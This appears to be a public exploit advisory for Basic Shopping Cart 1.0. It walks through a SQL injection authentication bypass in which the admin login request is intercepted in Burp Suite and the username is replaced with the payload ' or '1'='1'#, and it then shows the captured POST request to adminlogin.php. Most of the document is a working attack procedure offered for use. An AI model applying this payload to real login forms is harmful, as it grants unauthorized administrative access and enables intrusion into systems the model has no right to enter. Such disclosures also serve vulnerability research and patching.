Basic Shopping Cart 1.0 SQL Injection

Basic Shopping Cart version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

MD5 | 684b20a18d440d8bc427b515567526b1

# Exploit Title: Basic Shopping Cart 1.0 - Authentication Bypass
# Date: 2021-04-03
# Exploit Author: Viren Saroha (illusion)
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: Windows 10/Kali Linux


Step 1 - Go to url http://localhost/EdgeSketch/index.php and Click on Admin
Step 2 – Enter anything in username and password
Step 3 – Click on Login and capture the request in burpsuite
Step4 – Change the username to ' or '1'='1'#
Step 5 – Click forward and now you will be logged in as admin.


POST /EdgeSketch/adminlogin.php HTTP/1.1
Host: localhost
Content-Length: 77
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Referer: http://localhost/EdgeSketch/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=6b7072bb40c321cb336aacef057a0876
Connection: close


Related Posts